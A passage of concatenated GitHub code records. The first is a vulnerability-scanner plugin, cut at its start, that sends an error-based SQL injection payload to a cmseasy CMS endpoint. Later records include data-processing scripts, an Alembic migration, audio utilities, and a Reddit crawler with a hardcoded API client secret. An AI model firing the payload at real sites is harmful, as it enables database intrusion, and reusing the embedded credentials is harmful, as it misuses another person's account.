Lucifer\ndescription: 文件/coupon/s.php中,参数fids存在SQL注入。\n'''\nimport sys\nimport json\nimport requests\n\n\n\nclass cmseasy_header_detail_sqli_BaseVerify:\n def __init__(self, url):\n self.url = url\n\n def run(self):\n headers = {\n \"User-Agent\":\"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\n }\n post_data = {\n \"xajax\":\"Postdata\",\n \"xajaxargs[0]\":\"detail=xxxxxx'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT (ELT(1=1,md5(1234)))),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)AND'1'='1\",\n }\n payload = \"/celive/live/header.php\"\n vulnurl = self.url + payload\n try:\n req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)\n if r\"81dc9bdb52d04dc20036dbd8313ed055\" in req.text:\n return \"[+]存在cmseasy header.php 报错注入漏洞...(高危)\\tpayload: \"+vulnurl+\"\\npost: \"+json.dumps(post_data, indent=4)\n\n except:\n return \"[-]connect timeout\"\n\nif __name__ == \"__main__\":\n\n testVuln = cmseasy_header_detail_sqli_BaseVerify(sys.argv[1])\n testVuln.run()","repo_name":"iceyhexman/onlinetools","sub_path":"scanner/plugins/cms/cmseasy/cmseasy_header_detail_sqli.py","file_name":"cmseasy_header_detail_sqli.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":1626,"dataset":"github-code","pt":"6"} +{"seq_id":"32506846523","text":"import json\nimport os\n\n\nclass Cache():\n \"\"\"Cache handler\n\n Saves and retrieves a data dictionary to a cache file. Supports dot\n notation to get and set dictionary fields.\n\n \"\"\"\n\n def __init__(self, cfg_dir, filename=\".cache\"):\n \"\"\"Cache constructor\n\n Args:\n cfg_dir : Directory where the .update is located/created\n\n \"\"\"\n self.path = os.path.join(cfg_dir, filename)\n self.data = {}\n self.load()\n\n def load(self):\n \"\"\"Load data from the cache file\"\"\"\n if (not os.path.exists(self.path)):\n return\n\n try:\n with open(self.path, 'r') as fd:\n self.data = json.load(fd)\n except json.decoder.JSONDecodeError:\n return\n\n def save(self):\n \"\"\"Save data into the cache file\n\n Args:\n cli_update : Version of a new CLI version available for update,\n if any\n\n \"\"\"\n with open(self.path, 'w') as fd:\n json.dump(self.data, fd)\n\n def get(self, field):\n \"\"\"Get using dot notation\"\"\"\n nested_keys = field.split('.')\n tmp = self.data\n for i, key in enumerate(nested_keys):\n if key not in tmp:\n return None\n if i == len(nested_keys) - 1:\n return tmp[key]\n tmp = tmp[key]\n\n def set(self, field, val, overwrite=True):\n \"\"\"Set using dot notation\"\"\"\n nested_keys = field.split('.')\n tmp = self.data\n for i, key in enumerate(nested_keys):\n if key not in tmp:\n tmp[key] = {}\n if i == len(nested_keys) - 1:\n if (key in tmp and not overwrite):\n return\n tmp[key] = val\n tmp = tmp[key]\n","repo_name":"Blockstream/satellite","sub_path":"blocksatcli/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":949,"dataset":"github-code","pt":"6"} +{"seq_id":"21658089979","text":"import tensorflow as tf\nimport os\nfrom skimage.io import imread\nfrom skimage.transform import resize\nimport progressbar\n\nimport numpy as np\nfrom data.gene_label import COLOR_MAPS\nfrom PIL import Image\n\n\nclass Img(object):\n def __init__(self, img_path, label_path):\n self.img_path = img_path\n self.label_path = label_path\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef convert_to(img_list, target_dir, img_size, name=\"train\"):\n \"\"\"\n build records file\n :param img_list: a list of Img objects generated by 'parse_txt_file'\n :param target_dir: the target directory that you want to save the records file\n :param img_size: tuple (height, width)\n :param name: using to specify the record file's name. the generated file name is 'name.tfrecords'\n :return: Nothing\n \"\"\"\n if not isinstance(img_list, list):\n raise ValueError(\"img_list must be a list\")\n\n total_num = len(img_list)\n\n ####\n widgets = [\"processing: \", progressbar.Percentage(),\n \" \", progressbar.ETA(),\n \" \", progressbar.FileTransferSpeed(),\n ]\n bar = progressbar.ProgressBar(widgets=widgets, max_value=total_num).start()\n ####\n\n filename = os.path.join(target_dir, name + '.tfrecords')\n print('Writing', filename)\n writer = tf.python_io.TFRecordWriter(filename)\n for i, img in enumerate(img_list):\n bar.update(i)\n img_data = resize(imread(img.img_path), output_shape=img_size, mode='constant',\n preserve_range=True).astype(np.uint8)\n img_label = resize(np.array(Image.open(img.label_path), dtype=np.uint8), output_shape=img_size,\n mode='constant', order=0, preserve_range=True).astype(np.uint8)\n img_label[img_label == 255] = 0\n\n\n # img_label = semantic_img2class(img_label, color_maps)\n # height = img_data.shape[0]\n # width = img_data.shape[1]\n # depth = img_data.shape[2]\n\n # img_data [256, 256, 3], label [256, 256]\n img_data_raw = img_data.tostring()\n img_label_raw = img_label.tostring()\n example = tf.train.Example(features=tf.train.Features(feature={\n 'height': _int64_feature(img_size[0]),\n 'width': _int64_feature(img_size[1]),\n 'depth': _int64_feature(3),\n 'label': _bytes_feature(img_label_raw),\n 'image_raw': _bytes_feature(img_data_raw)}))\n writer.write(example.SerializeToString())\n writer.close()\n bar.finish()\n print(\"done\")\n\n\ndef semantic_img2class(img, color_maps):\n if not isinstance(img, np.ndarray):\n raise ValueError(\"img must be ndarray, not the %s\" % type(img))\n labels = []\n height, width, _ = img.shape\n for i in range(height):\n row_label = []\n for j in range(width):\n color = list(img[i, j])\n label = color_maps.index(color)\n row_label.append(label)\n labels.append(row_label)\n\n labels = np.array(labels).astype(np.uint8)\n return labels\n\n\ndef suffix_png2jpg(name):\n name, suffix = name.split('.')\n name += '.jpg'\n return name\n\n\ndef generate_Img_list(img_dir, label_dir):\n labels = os.listdir(label_dir)\n labels_abs_path = [os.path.join(label_dir, label) for label in labels]\n imgs_abs_path = [os.path.join(img_dir, suffix_png2jpg(img)) for img in labels]\n num_data = len(labels)\n Img_list = []\n for i, img_path in enumerate(imgs_abs_path):\n img_obj = Img(img_path, label_path=labels_abs_path[i])\n Img_list.append(img_obj)\n print(\"number of data %d\" % num_data)\n return Img_list\n\n\ndef main():\n img_dir = '/media/fanyang/workspace/DataSet/VOCdevkit/VOC2012/JPEGImages'\n label_dir = '/media/fanyang/workspace/DataSet/VOCdevkit/VOC2012/SegmentationClass'\n target_dir = '/media/fanyang/workspace/DataSet/VOCdevkit/VOC2012'\n NUM_DATA = 2913\n Img_list = generate_Img_list(img_dir=img_dir, label_dir=label_dir)\n convert_to(img_list=Img_list, target_dir=target_dir, img_size=(256, 256),\n name=\"semantic_2012_train\")\n pass\n\n\n# image size [256, 256, 3]\n\nif __name__ == '__main__':\n main()\n","repo_name":"keithyin/FCN-tf","sub_path":"data/generate_records.py","file_name":"generate_records.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"32331044263","text":"import numpy as np\nfrom helper_functions import print_msg\nimport const\nimport conv\n\n#A simple struct to hold info about single halo\nclass Halo:\n\t'''\n\tA simple struct to hold info about a single halo\n\t'''\n\tdef __init__(self):\n\t\tself.pos = (0.0, 0.0, 0.0) #Position in grid points\n\t\tself.pos_cm = (0.0, 0.0, 0.0) #Center of mass position in grid points\n\t\tself.vel = (0.0, 0.0, 0.0) #Velocity in simulation units\n\t\tself.l = (0.0, 0.0, 0.0) #Angular momentum in simulation units\n\t\tself.vel_disp = 0.0 #Velocity dispersion in simulation units\n\t\tself.r = 0.0 #Virial radius in grid units\n\t\tself.m = 0.0 #Grid mass\n\t\tself.mp = 0 #Number of particles\n\t\tself.solar_masses = 0.0 #Mass in solar masses\n\n\nclass HaloList:\n\t'''\n\tA class that holds information about a large number of halos, as read from a \n\thalo list file.\n\tContains methods to select halos based on different criteria. This file is very slow\n\tif you need to read a large number of halos.\n\t\n\tTODO: write a better implementation of this class.\n\t'''\n\tdef __init__(self, filename=None, min_select_mass = 0.0, max_select_mass = None, \n\t\t\tmax_select_number=-1, startline = 0):\n\t\t'''\n\t\tInitialize the object. If filename is given, read the file. Otherwise,\n\t\tdo nothing.\n\t\t\n\t\tParameters:\n\t\t\t* filename = None (string): The file to read from\n\t\t\t* min_select_mass = 0.0 (float): The lower threshold mass in solar masses.\n\t\t\t\tOnly halos above this mass will be read.\n\t\t\t* max_select_mass = None (float): The upper threshold mass in solar masses.\n\t\t\t\tOnly halos below this mass will be read. If None, there is no limit.\n\t\t\t* max_select_number = -1 (int): The max number of halos to read. If -1, there\n\t\t\t\tis no limit.\n\t\t\t* startline = 0 (int): The line in the file where reading will start.\n\t\tReturns:\n\t\t\tNothing\n\t\t'''\n\t\tself.halos = []\n\n\t\tif filename:\n\t\t\tself.read_from_file(filename, min_select_mass, max_select_mass, max_select_number, \n\t\t\t\t\tstartline)\n\n\tdef read_from_file(self,filename, min_select_mass = 0.0, max_select_mass = None, max_select_number=-1, \n\t\t\tstartline=0):\n\t\t'''\n\t\tRead a halo list.\n\t\t\n\t\tParameters:\n\t\t\t* filename (string): The file to read from\n\t\t\t* min_select_mass = 0.0 (float): The lower threshold mass in solar masses.\n\t\t\t\tOnly halos above this mass will be read.\n\t\t\t* max_select_mass = None (float): The upper threshold mass in solar masses.\n\t\t\t\tOnly halos below this mass will be read. If None, there is no limit.\n\t\t\t* max_select_number = -1 (int): The max number of halos to read. If -1, there\n\t\t\t\tis no limit.\n\t\t\t* startline = 0 (int): The line in the file where reading will start.\n\t\tReturns:\n\t\t\tTrue if all the halos were read. False otherwise.\n\t\t'''\n\n\t\tself.halos = []\n\n\t\tprint_msg('Reading halo file %s...' % filename)\n\t\tself.filename = filename\n\t\timport fileinput\n\n\t\t#Store the redshift from the filename\n\t\timport os.path\n\t\tname = os.path.split(filename)[1]\n\t\tself.z = float(name.split('halo')[0])\n\n\t\t#Read the file line by line, since it's large\n\t\tlinenumber = 1\n\t\tmin_select_grid_mass = min_select_mass/(conv.M_grid*const.solar_masses_per_gram)\n\t\tif max_select_mass:\n\t\t\tprint_msg('Max_select_mass: %g' % max_select_mass)\n\t\t\tmax_select_grid_mass = max_select_mass/(conv.M_grid*const.solar_masses_per_gram)\n\n\t\tfor line in fileinput.input(filename):\n\t\t\tif linenumber < startline: #If you want to read from a particular line\n\t\t\t\tlinenumber += 1\n\t\t\t\tcontinue\n\t\t\tif max_select_number >= 0 and len(self.halos) >= max_select_number:\n\t\t\t\tfileinput.close()\n\t\t\t\treturn False\n\t\t\tif linenumber % 100000 == 0:\n\t\t\t\tprint_msg('Read %d lines' % linenumber)\n\t\t\tlinenumber += 1\n\n\t\t\tvals = line.split()\n\t\t\tgrid_mass = float(vals[-3])\n\n\t\t\t#Create a halo and add it to the list\n\t\t\tif grid_mass > min_select_grid_mass and (max_select_mass == None or grid_mass < max_select_grid_mass):\n\t\t\t\thalo = Halo()\n\t\t\t\thalo.pos = np.array(map(float, vals[:3]))\n\t\t\t\thalo.pos_cm = np.array(map(float, vals[3:6]))\n\t\t\t\thalo.vel = np.array(map(float, vals[6:9]))\n\t\t\t\thalo.l = np.array(map(float, vals[9:12]))\n\t\t\t\thalo.vel_disp = float(vals[12])\n\t\t\t\thalo.r = float(vals[13])\n\t\t\t\thalo.m = float(vals[14])\n\t\t\t\thalo.mp = float(vals[15])\n\t\t\t\thalo.solar_masses = grid_mass*conv.M_grid*const.solar_masses_per_gram\n\t\t\t\tself.halos.append(halo)\n\n\t\tfileinput.close()\n\n\t\treturn True\n\n\t\t\t\n\n","repo_name":"hjens/c2raytools","sub_path":"src/c2raytools/halo_list.py","file_name":"halo_list.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"6"} +{"seq_id":"15554310505","text":"from sklearn.tree import DecisionTreeClassifier\nimport pandas as pd \nfrom sklearn.metrics import accuracy_score\nimport numpy as np \n\nattributes=['buying', 'maint', 'doors', 'persons', 'lug_boot', 'safety', 'class']\n\n\ndf = pd.read_csv('ds/car_evaluation.csv')\nX = pd.get_dummies(df[attributes[0:6]])\nY = pd.get_dummies(df[attributes[6]])\nprint('one hot encoding done')\nmsk = np.random.rand(len(df)) < 0.8 #80 percent split\nprint(msk)\nX_train = X[msk]\nY_train = Y[msk]\nY_test = Y[~msk]\nX_test = X[~msk]\nprint('split done')\n\n\n\n\nclf = DecisionTreeClassifier(random_state=0)\nclf = clf.fit(X_train,Y_train)\n\nY_pred = clf.predict(X_train)\n\nprint(\"train accuracy:\")\nprint(accuracy_score(Y_train, Y_pred))\n\nY_pred = clf.predict(X_test)\n\nprint(\"test accuracy:\")\nprint(accuracy_score(Y_test, Y_pred))","repo_name":"shobhit-coder/fuzzy-decision-tree","sub_path":"decisionTreeSKLearn.py","file_name":"decisionTreeSKLearn.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19366868963","text":"\"\"\"\ntfile1.py\nChapter 7 Cool Features of Python\nAuthor: William C. Gunnells\nRapid Python Programming\n\"\"\"\n\n\nwith open(\"blah.txt\", \"r\") as f:\n my_list = f.readlines()\n\n\ndef mygen(data):\n for lines in data:\n yield lines\n\n\nif __name__ == \"__main__\":\n for i in mygen(my_list):\n print(i)\n","repo_name":"thecount12/rapidpythonprogramming","sub_path":"chapter7/tfile1.py","file_name":"tfile1.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"18536579008","text":"from datetime import datetime\nstart = datetime.now()\nimport torch\nimport torch.nn as nn\nimport pytorch_lightning as pl\nfrom collections import OrderedDict\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nfrom pytorch_lightning.callbacks import RichProgressBar\nfrom natsort import natsorted\nimport glob\nimport tensorflow as tf\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nprint('Using device (set to GPU if available):', device)\n\ndef make_parser(): #, rna_mode\n def parse_proto(example_protos):\n \"\"\"Parse TFRecord protobuf.\"\"\"\n feature_spec = {\n 'sequence': tf.io.FixedLenFeature([], dtype = tf.string),\n 'target': tf.io.FixedLenFeature([], dtype = tf.string),\n }\n feature_tensors = tf.io.parse_single_example(example_protos, features=feature_spec)\n target = tf.io.decode_raw(feature_tensors['target'], tf.float16)\n target = tf.reshape(target, (896, 22)) ### 22 tracks\n target = tf.cast(target, tf.float32)\n return target\n return parse_proto\n\ndef file_to_records(filename):\n return tf.data.TFRecordDataset(filename, compression_type='ZLIB')\n\ndef get_target(subset = 'train'):\n tfr_path = f'/exports/humgen/idenhond/data/basenji_preprocess/output_tfr/tfrecords/{subset}*.tfr'\n tfr_files = natsorted(glob.glob(tfr_path))\n print(f'number of tfr files for {subset} subset: {len(tfr_files)}')\n dataset = tf.data.Dataset.from_tensor_slices(tfr_files)\n dataset = dataset.flat_map(file_to_records)\n dataset = dataset.map(make_parser())\n dataset = dataset.batch(1)\n\n # instead of adding targets to big array, save to seperate file in iteration\n # save to folder data/Enformer_train/Enformer_train_targets\n # targets = []\n for i, target in enumerate(dataset):\n # # target_np = target.numpy()\n # # print(type(target_np))\n # # print(target_np.shape)\n # target_tensor = torch.from_numpy(target.numpy())\n # # print(target_tensor.shape)\n # new_tensor = torch.zeros(1,896,19)\n # indices = [0, 1,2,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]\n # for x, j in enumerate(indices):\n # new_tensor[:,:,x] = target_tensor[:,:, j]\n\n # # print(new_tensor.shape)\n\n # # torch.save(new_tensor, f'/exports/humgen/idenhond/data/Enformer_validation/Enformer_validation_targets_newtracks2703/targets_seq{i+1}.pt')\n # # torch.save(new_tensor, f'/exports/humgen/idenhond/data/Enformer_test/Enformer_test_targets_newtracks2703/targets_seq{i+1}.pt')\n # torch.save(new_tensor, f'/exports/humgen/idenhond/data/Enformer_train/Enformer_train_targets_newtracks2703/targets_seq{i+1}.pt')\n # hierboven was hoe je de targets voor de new tracks only hebt opgeslage (dus verkeerd, je moet 2,3,4 overslaan bij de indices en niet 3,4,5)\n\n # nu hier: opslaan alleen oude targets uit de 22 tracks\n target_tensor = torch.from_numpy(target.numpy())\n new_tensor = torch.zeros(1,896,3)\n indices = [2,3,4]\n for x, j in enumerate(indices):\n new_tensor[:,:,x] = target_tensor[:,:, j]\n\n torch.save(new_tensor, f'/exports/humgen/idenhond/data/Enformer_train/Enformer_train_3tracks_remade/targets_seq{i+1}.pt')\n\n return None\n\nget_target()\n\n\n\n\"\"\"\nde tfr files hebben 22 tracks (index 0 - 21)\nindex 3,4,5 zijn van enformer --> die moet je eruit halen\n\n\"\"\"","repo_name":"icdh99/LUMC_internship_enformer_continual","sub_path":"enformer/dnn_head/train_newtracks_2703/store_target_as_tensor.py","file_name":"store_target_as_tensor.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14102686906","text":"import numpy as np\nfrom ksvd import ApproximateKSVD\nimport nibabel as nib\nimport matplotlib.pyplot as plt\nfrom .blocks_github import extract_patches_2d, reconstruct_from_patches_2d\n\n\ndef build_ksvd(blocked, n_components=30, n_nonzero=None):\n aksvd = ApproximateKSVD(\n n_components=n_components, \n # transform_n_nonzero_coefs=n_nonzero\n )\n dictionary = aksvd.fit(blocked).components_\n gamma = aksvd.transform(blocked)\n error = np.abs(gamma @ dictionary - blocked).mean()\n print('MAE: {:.3f}, Nonzero: {}'.format(error, len(np.nonzero(gamma[0]))))\n return dictionary, gamma\n\ndef _get_weights(gamma):\n tmp = (gamma != 0).sum(axis=0)\n tmp = tmp / tmp.sum()\n return tmp\n\ndef make_weighted_dict(dictionary, gamma, delta=8):\n weights = _get_weights(gamma)\n dictionary_new = dictionary * (1 + delta * weights).reshape(-1, 1)\n return dictionary_new\n\ndef ksvd_filtering(image, patch_size=4, n_components=20, n_nonzero=None, delta=2):\n blocked = extract_patches_2d(image, (patch_size, patch_size)).reshape(-1, patch_size ** 2)\n mean = np.mean(blocked, axis=1)[:, np.newaxis]\n # std = np.std(blocked, axis=1)[:, np.newaxis]\n\n blocked = (blocked - mean)\n D, A = build_ksvd(blocked, n_components=n_components, n_nonzero=n_nonzero)\n D = make_weighted_dict(D, A, delta=delta)\n patches = (A @ D + mean)\n img_modif = reconstruct_from_patches_2d(patches.reshape(-1, patch_size, patch_size), image_size=image.shape)\n return D, A, patches, img_modif\n","repo_name":"Alexkkir/sr-tomography","sub_path":"lib/ksvd.py","file_name":"ksvd.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28589776062","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 21 11:00:17 2021\n\n@author: SHIRISH\n\"\"\"\n\n\nimport Model as m\nimport tensorflow as tf\nimport os\nimport numpy as np\nimport Utility as u\n\n\n\n\nsampling_rate = 16000\n\nmodel = m.build_model((sampling_rate//2,1),30)\n\n#model.summary()\n\nmodel.compile(optimizer='Adam',loss='sparse_categorical_crossentropy',metrics=['accuracy'])\n\nmodel.load_weights('Speech_To_Text_model.h5')\n\nclass_names_dict ={}\ni = 0\nfor files in os.listdir('augmented_dataset'):\n class_names_dict[i]=files\n i+=1\n\n\naudio_path = []\nfile_name = os.path.join(\"Test\",\"9.wav\")\naudio_path.append(file_name)\nlabel =[0]\n\ntest_ds = u.GenDataset(audio_path,label)\n\nfor audio,_ in test_ds.take(1):\n #add extra dimension to audio\n audio = np.asarray(audio)\n audio = audio.reshape((1,)+audio.shape)\n audio = tf.convert_to_tensor(audio)\n ffts = u.Fourier_transform(audio)\n prediction = model.predict(ffts)\n print(\"The sound predicted is \",class_names_dict[np.argmax(prediction)])\n","repo_name":"DoraemonSlayer69/Speech-To-Text-Convertor","sub_path":"Test_model_audio.py","file_name":"Test_model_audio.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36522276820","text":"def pfunction(s):\n n = len(s)\n p = [0] * n\n for i in range(1, n):\n k = p[i - 1]\n while k > 0 and s[i] != s[k]:\n k = p[k - 1]\n if s[i] == s[k]:\n k += 1\n p[i] = k\n return p\n \n \np = input()\nt = input()\npref = pfunction(p + \"#\" + t)\n\nres = []\nn = len(p)\nfor i in range(len(pref)):\n if pref[i] == n:\n res.append(i)\nprint(len(res))\nprint(*[i - 2 * n + 1 for i in res])\n","repo_name":"AverPower/Algorithms_and_Structures","sub_path":"14. Basic String Algorithms/Task C.py","file_name":"Task C.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29915244041","text":"\"\"\"empty message\n\nRevision ID: 8bec726f17fb\nRevises: 9578ff987878\nCreate Date: 2020-01-22 11:38:17.886992\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8bec726f17fb'\ndown_revision = '9578ff987878'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('food',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=80), nullable=False),\n sa.Column('comment', sa.String(length=200), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('created_by', sa.String(length=80), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('food')\n # ### end Alembic commands ###\n","repo_name":"ariesunique/food-journal","sub_path":"migrations/versions/8bec726f17fb_.py","file_name":"8bec726f17fb_.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26079860910","text":"# python3 crawling.py\r\nfrom typing import List\r\nimport praw\r\nfrom praw.models import MoreComments\r\nimport pandas as pd\r\nLIMIT = float(\"inf\") #DEBUG : change to large number\r\n\r\n# web scraping functions\r\ndef scrapePosts(post): #gets data from all posts and top-level comments in each post\r\n list1 = [post.title, post.score, post.id, post.subreddit, post.url, post.num_comments, post.selftext, post.created]\r\n\r\n #looping through comments of a post\r\n submission = reddit.submission(id=post.id)\r\n for top_level_comment in submission.comments[0:]: #Note: Comments sorted by Best\r\n if isinstance(top_level_comment, MoreComments):\r\n continue\r\n list2.append(top_level_comment.body)\r\n\r\n postList.append(list1 + list2) # append post info + comments\r\n list2.clear()\r\n\r\ndef allSubreddit(keyword,hot): # searches all subreddits for keyword\r\n\r\n if hot == 0:\r\n allPosts = reddit.subreddit(\"/all\").search(keyword, limit=LIMIT)\r\n else:\r\n allPosts = reddit.subreddit(\"/all\").search(keyword, sort =\"hot\", limit=LIMIT)\r\n\r\n print(\"Post Number:\")\r\n count = 1\r\n for post in allPosts:\r\n scrapePosts(post)\r\n print(count)\r\n count = count + 1\r\n\r\ndef subredditSearch(subRed, keyword, hot): # searches specific subreddit for keyword\r\n\r\n if hot == 0:\r\n if keyword == \"\":\r\n allPosts = reddit.subreddit(subRed).new(limit=LIMIT) #sorted by new\r\n else:\r\n allPosts = reddit.subreddit(subRed).search(keyword, limit=LIMIT) #sorted by relevance\r\n\r\n else:\r\n if keyword == \"\":\r\n allPosts = reddit.subreddit(subRed).hot(limit=LIMIT)\r\n else:\r\n #allPosts = reddit.subreddit(subRed).hot(limit=LIMIT).search(keyword)\r\n allPosts = reddit.subreddit(subRed).search(keyword,sort=\"hot\", limit=LIMIT)\r\n\r\n print(\"Post Number:\")\r\n count = 1\r\n for post in allPosts:\r\n scrapePosts(post)\r\n print(count)\r\n count = count + 1\r\n\r\n# authentication\r\nmy_client_id = \"Q_pq9JUikHu4tof6QnzJoQ\"\r\nmy_client_secret = \"mPFJC9RLRLEJOavJz6Zv7rdaCrmCXQ\"\r\nmy_user_agent = \"crawlingKeywords\"\r\nreddit = praw.Reddit(client_id = my_client_id, client_secret= my_client_secret, user_agent= my_user_agent)\r\n\r\n#search selection\r\nsubRed = input(\"Type subreddit to search (leave blank for all): \")\r\nkeyword = input(\"Type keyword to search (leave blank for none): \")\r\nhot = input(\"Sort by Hot posts? (0=No, 1=Yes): \")\r\n\r\n# preparing lists to hold data\r\npostList = []\r\nlist1 = []\r\nlist2 = []\r\npostList.append(['title', 'score', 'id', 'subreddit', 'url', 'num_comments', 'body', 'created', 'Comments:'])\r\n\r\n#search either all subreddits or specific\r\nif subRed == \"\":\r\n allSubreddit(keyword, hot)\r\nelse:\r\n subredditSearch(subRed, keyword, hot)\r\n\r\n\r\n# convert postList to datframe and csv file\r\npostList = pd.DataFrame(postList)\r\npostList.to_csv(\"results.csv\", index=False)\r\nprint(\"Crawling finished. Results shown in results.csv\")","repo_name":"zanthony42/redditKeywordCrawler","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74016924347","text":"import scipy.signal as sci_signal\nimport os\nimport librosa\nfrom typing import List, Tuple\nimport numpy as np\nimport soundfile as sf\nimport matplotlib.pyplot as plt\nimport json\nfrom tqdm import tqdm\ndef read_wav(path: str):\n y, sr = librosa.load(path,mono=True)\n return y, sr\n\ndef write_wav(signal : List[float],fs : int,path: str):\n sf.write(\n file = path,\n data=signal,\n samplerate=fs,\n format=\"WAV\"\n )\n \ndef write_freq_params (path,params) : \n params = np.array(params,dtype=np.float32)\n with open(path,\"wb\") as f : \n f.write(params.tobytes())\n \ndef read_freq_params (path):\n with open(path,\"rb\") as f :\n params = np.fromfile(f,dtype=np.float32) \n return params\n \ndef write_raw(signal, fs, path):\n signal = np.array(signal, dtype=np.float32)\n with open(path, \"wb\") as f:\n # Escribe la frecuencia de muestreo (fs) como bytes de 4 bytes\n f.write(fs.to_bytes(4, byteorder=\"little\"))\n # Escribe la señal como bytes\n f.write(signal.tobytes())\n\n\ndef read_raw(path):\n with open(path, \"rb\") as f:\n # Lee la frecuencia de muestreo (fs) desde el archivo\n fs_bytes = f.read(4)\n fs = int.from_bytes(fs_bytes, byteorder=\"little\")\n \n # Lee la señal desde el archivo en el formato float32\n signal = np.fromfile(f, dtype=np.float32)\n\n return signal, fs\n\ndef get_mfcc (signal,fs:int,n_mfcc = 15) :\n mfcc_signal = librosa.feature.mfcc(\n y=signal,\n sr=fs,\n n_mfcc=n_mfcc\n )\n \n return mfcc_signal\n\n\ndef get_beats(y, sr, hop_length: int = 512):\n _, frames = librosa.beat.beat_track(sr=sr, y=y, hop_length=hop_length)\n beat_times = librosa.frames_to_samples(frames=frames, hop_length=hop_length)\n return beat_times\n\ndef split(signal,fs : int, seconds: float = 0.1):\n split_length = int(seconds * fs)\n \n signal_segments = []\n for split_point in range(0, len(signal) - split_length, split_length):\n segment = signal[split_point: split_point + split_length]\n signal_segments.append(segment)\n \n return signal_segments\n\ndef combine(signal_set):\n num_signals = len(signal_set)\n \n if num_signals == 0:\n raise ValueError(\"No signal sets provided to combine.\")\n \n min_length = min([len(signal) for signal, _ in signal_set])\n combined_signal = np.zeros(min_length)\n frame_samples = signal_set[0][1] # Tomamos la frecuencia de muestreo del primer conjunto\n \n for i in range(0, num_signals):\n signal, fs = signal_set[i]\n \n if len(signal) != min_length:\n raise ValueError(f\"Signal in set {i} has a different length. All signals must have the same length.\")\n \n combined_signal += signal\n \n return combined_signal, frame_samples\n\ndef time_normalizer (path : str,time : float = 1.5,write = True) :\n signal,fs = read_wav(path)\n target_length = int(time * fs)\n signal_length = len(signal) \n if signal_length > target_length : \n norm_signal = signal[:target_length]\n \n elif signal_length < target_length : \n missing_length = target_length - signal_length\n norm_signal = np.concatenate((signal,np.zeros(missing_length)))\n \n else :\n norm_signal = signal\n \n if(write == True):\n write_wav(\n signal=norm_signal,\n fs=fs,\n path=path\n )\n \n return norm_signal\n\ndef freq_spec(signal, fs):\n spec = np.fft.fft(signal)\n freqs = np.fft.fftfreq(len(spec), 1 / fs)\n mags = np.abs(spec)\n\n max_magnitude_index = np.argmax(mags)\n max_magnitude_frequency = round(freqs[max_magnitude_index], 2)\n\n plt.figure(figsize=(10, 4))\n plt.plot(freqs, mags)\n plt.scatter(freqs[max_magnitude_index], mags[max_magnitude_index], color='red', marker='o', label=f'Max Magnitude Frequency: {max_magnitude_frequency} Hz')\n plt.title(\"Señal\")\n plt.xlabel(\"Frecuencia (Hz)\")\n plt.ylabel(\"Magnitud\")\n plt.xlim(0, 2000)\n plt.grid(True)\n plt.legend()\n plt.show()\n \ndef event_split (signal,fs,t_group_tolerance = 0.1) :\n \n group_tolerance = t_group_tolerance * fs\n peaks,_ = sci_signal.find_peaks(signal,height=0.05)\n \n start_idxs = []\n for i in range(len(peaks)-1) : \n peak = peaks[i]\n if peak == peaks[0] : \n start_idxs.append(peak)\n else : \n if peaks[i] - peaks[i - 1] >= group_tolerance : \n start_idxs.append(peak)\n \n fragments = [signal[start_idxs[i] : start_idxs[i + 1]] for i in range(len(start_idxs) - 1)]\n \n return fragments\n \ndef compress(signal,fs) : \n new_fs = int(5512.5)\n compress_factor = int(fs / new_fs)\n comp_signal = sci_signal.decimate(signal,compress_factor)\n \n return comp_signal,new_fs\n\ndef 